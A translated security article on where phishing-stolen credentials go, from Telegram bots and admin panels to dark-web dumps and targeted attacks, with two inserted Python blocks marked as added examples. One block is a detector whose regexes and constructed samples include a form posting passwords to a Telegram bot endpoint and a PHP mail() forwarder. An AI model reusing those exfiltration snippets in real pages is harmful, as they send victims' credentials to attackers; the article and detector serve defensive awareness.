Cryptocurrency Theft Detail Report, Sold for Only $105 on the Dark Web

PANews

Author: Olga Altukhova
Editor: far@Centreless

Translation: Centreless, X (Twitter) @Tocentreless

A typical phishing attack involves a user clicking on a fraudulent link and entering credentials on a spoofed website. However, the attack is far from over at that point. Once confidential information falls into the hands of cybercriminals, it immediately becomes a commodity, entering the "production line" of the dark web market.

In this article, we will trace the flow of stolen data: from collection through various tools (such as Telegram bots and advanced management panels) to the sale of the data and its subsequent use in new attacks. We will explore how previously leaked usernames and passwords are integrated into vast digital profiles and why even data breaches from years ago can still be exploited by criminals to carry out targeted attacks.

Data Collection Mechanisms in Phishing Attacks

Before tracking the subsequent whereabouts of stolen data, we need to understand how this data leaves the phishing page and reaches the hands of cybercriminals.

Through the analysis of real phishing pages, we identified the following most common data transmission methods:

  • Sent to an email address
  • Sent to a Telegram bot
  • Uploaded to a management panel

It is worth mentioning that attackers sometimes use legitimate services for data collection to make their servers harder to detect. For example, they might use online form services like Google Forms or Microsoft Forms. Stolen data may also be stored on GitHub, Discord servers, or other websites. However, for the sake of this analysis, we will focus on the aforementioned primary data collection methods.

Email

The data entered by the victim in the HTML form of the phishing page is sent to the attacker's server via a PHP script, which then forwards it to an email address controlled by the attacker. However, due to various limitations of email services—such as delivery delays, the possibility of hosting providers blocking the sending server, and the inconvenience of handling large amounts of data—this method is gradually falling out of use.

Phishing kit contents

For example, we analyzed a phishing kit targeting DHL users. The index.php file contains a phishing form designed to steal user data (in this case, email addresses and passwords).

Phishing form imitating the DHL website

The information entered by the victim is then sent to the email address specified in the mail.php file via a script in the next.php file.

Contents of the PHP scripts

Telegram Bots

Unlike the aforementioned method, the script using Telegram bots specifies a Telegram API URL containing the bot token and corresponding chat ID instead of an email address. In some cases, this link is even hardcoded directly into the phishing HTML form. Attackers design detailed message templates that are automatically sent to the bot after successfully stealing data. A code example is as follows:

Code snippet for data submission

Compared to sending data via email, using Telegram bots provides phishers with stronger capabilities, making this method increasingly popular. Data is transmitted in real-time to the bot, immediately notifying the operator. Attackers often use disposable bots, which are harder to track and ban. Additionally, their performance does not depend on the quality of the phishing page hosting service.
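The two collection channels described above (a PHP script calling mail(), and a form or script posting straight to the Telegram Bot API with a hardcoded token and chat ID) leave recognisable traces in the page source. The following is an added defender-side example, not code from the original article: it scans the source of a suspected phishing page for those exfiltration indicators, plus form actions pointing at a foreign host and the abused legitimate services the article names, and produces a heuristic score. The sample pages, the host names, the bot token and the chat ID are all constructed; the scoring weights are an assumption of this example, not a published standard.

```python
"""Scan suspected phishing-page source for credential-exfiltration indicators.

Added example (not from the article). Sample inputs are constructed; the
Telegram token and chat ID below are fake. Weights and thresholds are
assumptions chosen for illustration.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Telegram Bot API call with an embedded bot token: .../bot<id>:<secret>/sendMessage
TELEGRAM_RE = re.compile(
    r"api\.telegram\.org/bot(?P<token>\d{6,}:[A-Za-z0-9_-]{20,})/send\w+", re.IGNORECASE
)
CHAT_ID_RE = re.compile(r"chat_id\W{0,8}(-?\d{5,})")
# PHP mail() forwarding to a variable or literal address, as in the mail.php/next.php pattern.
PHP_MAIL_RE = re.compile(r"\bmail\s*\(\s*(\$\w+|['\"][^'\"]+['\"])")
FORM_ACTION_RE = re.compile(r"<form[^>]*\baction\s*=\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)
# Field names that indicate credentials or card data are being handled.
CRED_FIELD_RE = re.compile(
    r"(?:\$_(?:POST|REQUEST|GET)\[['\"]|\bname\s*=\s*['\"])"
    r"(?:pass(?:word|wd|code)?|pin|otp|cvv|cvc|card(?:_?number)?)['\"]",
    re.IGNORECASE,
)
# Legitimate services the article notes are abused as drop points.
ABUSED_SERVICES = ("docs.google.com/forms", "forms.office.com", "discord.com/api/webhooks")


@dataclass
class ScanResult:
    telegram_tokens: list = field(default_factory=list)
    chat_ids: list = field(default_factory=list)
    mail_targets: list = field(default_factory=list)
    external_actions: list = field(default_factory=list)
    abused_services: list = field(default_factory=list)
    credential_fields: bool = False

    def risk_score(self) -> int:
        score = 0
        score += 50 if self.telegram_tokens else 0
        score += 10 if self.chat_ids else 0
        score += 30 if self.mail_targets else 0
        score += 20 if self.external_actions else 0
        score += 30 if self.abused_services else 0
        # Credential field names only matter when there is a channel to send them through;
        # a plain login form posting to its own site is not evidence of exfiltration.
        if score and self.credential_fields:
            score += 20
        return min(score, 100)

    def verdict(self) -> str:
        s = self.risk_score()
        if s >= 50:
            return "likely credential exfiltration"
        if s > 0:
            return "suspicious, review manually"
        return "no exfiltration indicators"


def redact_token(token: str) -> str:
    """Keep the bot ID (useful for takedown reports) but mask the secret before logging."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}***"


def scan_source(src: str, page_host: str) -> ScanResult:
    """page_host is the host the page was fetched from; actions elsewhere count as external."""
    r = ScanResult()
    r.telegram_tokens = [m.group("token") for m in TELEGRAM_RE.finditer(src)]
    r.chat_ids = CHAT_ID_RE.findall(src)
    r.mail_targets = PHP_MAIL_RE.findall(src)
    for action in FORM_ACTION_RE.findall(src):
        host = urlparse(action).netloc.lower()
        if host and host != page_host.lower():
            r.external_actions.append(action)
    low = src.lower()
    r.abused_services = [s for s in ABUSED_SERVICES if s in low]
    r.credential_fields = CRED_FIELD_RE.search(src) is not None
    return r


# Constructed sample 1: a next.php-style forwarder handing the posted form to mail().
SAMPLE_EMAIL_KIT = """<?php
include 'mail.php';   // defines $to
$body = "Email: " . $_POST['email'] . " Pass: " . $_POST['password'];
mail($to, "Result", $body);
header("Location: https://www.dhl.com/");
"""

# Constructed sample 2: a form posting directly to a (fake) Telegram bot endpoint.
SAMPLE_TELEGRAM_PAGE = """<html><body>
<form method="post"
      action="https://api.telegram.org/bot123456789:AAFakeTokenForIllustrationOnly_xx/sendMessage?chat_id=987654321">
  <input name="email"><input name="password"><button>Sign in</button>
</form></body></html>"""

# Constructed sample 3: an ordinary login form posting to its own site.
SAMPLE_BENIGN = '<form method="post" action="/login"><input name="password"></form>'

if __name__ == "__main__":
    for name, src in [("email kit", SAMPLE_EMAIL_KIT), ("telegram page", SAMPLE_TELEGRAM_PAGE), ("benign", SAMPLE_BENIGN)]:
        res = scan_source(src, "dhl-delivery.example")
        print(f"{name}: score={res.risk_score()} verdict={res.verdict()}",
              [redact_token(t) for t in res.telegram_tokens])
```

The redaction helper matters in practice: a scanner that copies full bot tokens into tickets or SIEM events simply spreads the secret further, while the numeric bot ID alone is enough for a report to the platform.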

Automated Management Panels

More sophisticated cybercriminals use specialized software, including commercial frameworks like BulletProofLink and Caffeine, typically offered as "Platform as a Service" (PaaS). These frameworks provide a web interface (dashboard) for phishing activities, facilitating centralized management.

All data collected from phishing pages controlled by attackers is aggregated into a unified database, which can be viewed and managed through their account interface.

Sending data to the administration panel

These management panels are used to analyze and process victim data. Specific functionalities vary based on panel customization options, but most dashboards typically have the following capabilities:

  • Real-time statistical classification: View the number of successful attacks by time and country, with data filtering support
  • Automatic validation: Some systems can automatically verify the validity of stolen data, such as credit card information or login credentials
  • Data export: Supports downloading data in various formats for later use or sale

Example of an administration panel

Management panels are key tools for organized cybercrime groups.

It is noteworthy that a single phishing operation often employs multiple data collection methods simultaneously.

Types of Data Sought by Cybercriminals

The data stolen in phishing attacks varies in value and use. In the hands of criminals, this data serves as both a means of profit and a tool for executing complex multi-stage attacks.

Based on usage, stolen data can be categorized into the following types:

  • Immediate monetization: Directly selling raw data in bulk or immediately stealing funds from the victim's bank account or e-wallet
    1. Bank card information: Card number, expiration date, cardholder name, CVV/CVC code
    2. Online banking and e-wallet accounts: Login names, passwords, and one-time two-factor authentication (2FA) codes
    3. Accounts linked to bank cards: Login credentials for online stores, subscription services, or payment systems like Apple Pay/Google Pay
  • Used for subsequent attacks to further monetize: Using stolen data to launch new attacks for additional profit
    1. Various online account credentials: Usernames and passwords. Notably, even without a password, an email or phone number used as a login name holds value for attackers
    2. Phone numbers: Used for phone scams (e.g., to obtain 2FA codes) or phishing via instant messaging applications
    3. Personal identification information: Full name, date of birth, address, etc., often used for social engineering attacks
  • Used for targeted attacks, extortion, identity theft, and deepfakes
    1. Biometric data: Voice, facial images
    2. Scanned personal documents and numbers: Passports, driver's licenses, social security cards, taxpayer identification numbers, etc.
    3. Selfies with identification: Used for online loan applications and identity verification
    4. Corporate accounts: Used for targeted attacks against businesses

We analyzed phishing and scam attacks that occurred from January to September 2025 to determine the types of data most commonly targeted by criminals. The results showed that 88.5% of attacks aimed to steal various online account credentials, 9.5% targeted personal identification information (name, address, date of birth), and only 2% focused on stealing bank card information.

Selling Data on the Dark Web Market

Apart from the data used in real-time attacks or monetized immediately, most stolen data is not put to use right away. Let's take a closer look at its flow path:

1. Data Bundling for Sale

Once data is aggregated, it is sold in the dark web market in the form of "data dumps"—these compressed packages typically contain millions of records from various phishing attacks and data breaches. A data dump can sell for as little as $50. The main buyers are often not active scammers but dark web data analysts, who are the next link in the supply chain.

2. Classification and Verification

Dark web data analysts filter the data by type (email accounts, phone numbers, bank card information, etc.) and run automated scripts for verification. This includes checking the validity of the data and its potential for reuse—for example, whether a set of Facebook account passwords can also log into Steam or Gmail. Since users tend to use the same password across multiple sites, data stolen from a service years ago may still be applicable to other services today. Accounts that have been verified and can still log in fetch a higher price when sold.

Analysts also correlate and integrate user data from different attack events. For instance, an old social media leaked password, login credentials obtained from a spoofed government portal phishing form, and a phone number left on a scam website may all be compiled into a complete digital profile of a specific user.

3. Selling in Specialized Markets

Stolen data is typically sold through dark web forums and Telegram. The latter is often used as an "online store," showcasing prices, buyer reviews, and other information.

Offers of social media data, as displayed in Telegram

Account prices vary widely, depending on various factors: account age, balance, linked payment methods (bank cards, e-wallets), whether two-factor authentication (2FA) is enabled, and the reputation of the service platform. For example, an e-commerce account linked to an email, with 2FA enabled, a long usage history, and a large number of order records, will sell for a higher price; for gaming accounts like Steam, expensive game purchase records will increase their value; while online banking data involving high-balance accounts from reputable banks will command a significant premium.

The table below shows examples of various account prices found on dark web forums as of 2025*.

4. High-Value Target Selection and Targeted Attacks

Criminals particularly focus on high-value targets—users who possess important information, such as corporate executives, accountants, or IT system administrators.

An example of a "whaling" attack scenario: Company A experiences a data breach that includes the information of an employee who previously worked there and is now an executive at Company B. The attackers analyze open-source intelligence (OSINT) to confirm that this user is currently employed at Company B. They then carefully forge a phishing email that appears to come from the CEO of Company B and send it to the executive. To enhance credibility, the email even references some facts about the user from their previous company (of course, the attack methods go beyond this). By lowering the victim's vigilance, the criminals have the opportunity to further infiltrate Company B.

It is important to note that such targeted attacks are not limited to the corporate sector. Attackers may also target individuals with high bank account balances or users holding important personal documents (such as those required for micro-loan applications).

Key Insights

The flow of stolen data operates like an efficiently running assembly line, with each piece of information becoming a commodity with a clear price tag. Today's phishing attacks widely employ diverse systems to collect and analyze sensitive information. Once data is stolen, it quickly flows into Telegram bots or the attacker's management panel, where it is classified, verified, and monetized.

We must be acutely aware that once data is leaked, it does not simply disappear. Instead, it is continuously accumulated and integrated, and may be used for targeted attacks, extortion, or identity theft months or even years later. In today's cyber environment, remaining vigilant, setting unique passwords for each account, enabling multi-factor authentication, and regularly monitoring one's digital footprint is no longer a suggestion but a necessity for survival.

If you unfortunately become a victim of a phishing attack, please take the following actions:

  1. If your bank card information is leaked, immediately call the bank to report and freeze the card.
  2. If account credentials are stolen, immediately change the password for that account and also update the passwords for all other online services that use the same or similar passwords. Be sure to set a unique password for each account.
  3. Enable multi-factor authentication (MFA/2FA) on all supported services.
  4. Check the login history of your accounts and terminate any suspicious sessions.
  5. If your instant messaging or social media accounts are compromised, immediately notify friends and family to warn them about fraudulent messages sent in your name.
  6. Use professional services (such as Have I Been Pwned) to check if your data has appeared in known data breaches.
  7. Remain highly vigilant about any unexpected emails, phone calls, or promotional offers—if they seem credible, it is likely because attackers are leveraging your leaked data.
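The reuse check in step 2 and the breach check in step 6 above, together with the "Classification and Verification" stage described earlier (the same password from an old leak still opening other accounts), can be turned into a small audit a user or help desk can run over a password-manager export. The following is an added example and not part of the original article: the export rows and the "breached hash" corpus are constructed, and the prefix lookup only mimics the k-anonymity range query used by Have I Been Pwned's Pwned Passwords service (the client sends the first five hex characters of the SHA-1 hash and matches the suffix locally); here the corpus is a local dictionary so the script runs offline. The "similar password" rule (same letters once digits and punctuation are stripped) is a heuristic assumed for illustration.

```python
"""Password-reuse and breached-password audit over a password-manager export.

Added example (not from the article). EXPORT and BREACHED are constructed.
The range lookup imitates the k-anonymity scheme of Pwned Passwords but is
served from a local dictionary so nothing leaves the machine.
"""
import hashlib
from collections import defaultdict

# Constructed export rows: (site, username, password). Real exports must never be printed or logged.
EXPORT = [
    ("facebook.example", "olga@example.com", "Summer2019!"),
    ("steam.example", "olga_gamer", "Summer2019!"),
    ("gmail.example", "olga@example.com", "Summer2019!"),
    ("bank.example", "olga", "xK9#p2Lm!vQ7wR4z"),
    ("shop.example", "olga@example.com", "Summer2020!"),
]


def _sha1(pw: str) -> str:
    return hashlib.sha1(pw.encode("utf-8")).hexdigest().upper()


# Constructed "breached" corpus: {5-char prefix: {35-char suffix: times seen}}.
BREACHED = defaultdict(dict)
for _pw, _count in [("Summer2019!", 1203), ("password", 9000000), ("qwerty123", 400000)]:
    _h = _sha1(_pw)
    BREACHED[_h[:5]][_h[5:]] = _count


def range_lookup(prefix: str) -> dict:
    """Stand-in for the k-anonymity range endpoint: every suffix stored under this prefix."""
    return BREACHED.get(prefix.upper(), {})


def breach_count(password: str) -> int:
    """Hash locally, query only the prefix, match the suffix client-side."""
    h = _sha1(password)
    return range_lookup(h[:5]).get(h[5:], 0)


def _stem(pw: str) -> str:
    """Letters only, lower-cased: 'Summer2019!' and 'Summer2020!' share the stem 'summer'."""
    return "".join(c for c in pw.lower() if c.isalpha())


def find_reuse(rows):
    """Group accounts by password hash; return only hashes shared by more than one account."""
    groups = defaultdict(list)
    for site, user, pw in rows:
        groups[_sha1(pw)].append((site, user))
    return {h: accts for h, accts in groups.items() if len(accts) > 1}


def audit(rows):
    """One finding per account: breach count, exact-reuse partners, similar-password partners."""
    reuse = find_reuse(rows)
    findings = []
    for site, user, pw in rows:
        h = _sha1(pw)
        stem = _stem(pw)
        reused_on = [s for s, _ in reuse.get(h, []) if s != site]
        similar_on = [
            s for s, _, p in rows
            if s != site and _sha1(p) != h and len(stem) >= 5 and _stem(p) == stem
        ]
        findings.append({"site": site, "user": user, "breached": breach_count(pw),
                         "reused_on": reused_on, "similar_on": similar_on})
    return findings


def prioritize(findings):
    """Order for rotation: known-breached first, then most widely reused, then most 'similar'."""
    return sorted(findings, key=lambda f: (0 if f["breached"] else 1,
                                           -len(f["reused_on"]), -len(f["similar_on"])))


if __name__ == "__main__":
    for f in prioritize(audit(EXPORT)):
        print(f"{f['site']:18} breached={f['breached']:>8} reused_on={f['reused_on']} similar_on={f['similar_on']}")
```

The output order is the rotation order: the three accounts sharing a password that appears in the breach corpus come first, the account with a merely similar password next, and the unique, unbreached bank password last. In a real run the `range_lookup` stand-in would be replaced by a call to the range endpoint with the same five-character prefix.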

Disclaimer: This article represents only the personal views of the author and not the position or views of this platform. It is provided for information sharing only and does not constitute investment advice to anyone. Any dispute between users and the author is unrelated to this platform. If an article or image published on this page infringes your rights, please send proof of the relevant rights and proof of identity to support@aicoin.com, and the platform's staff will investigate.
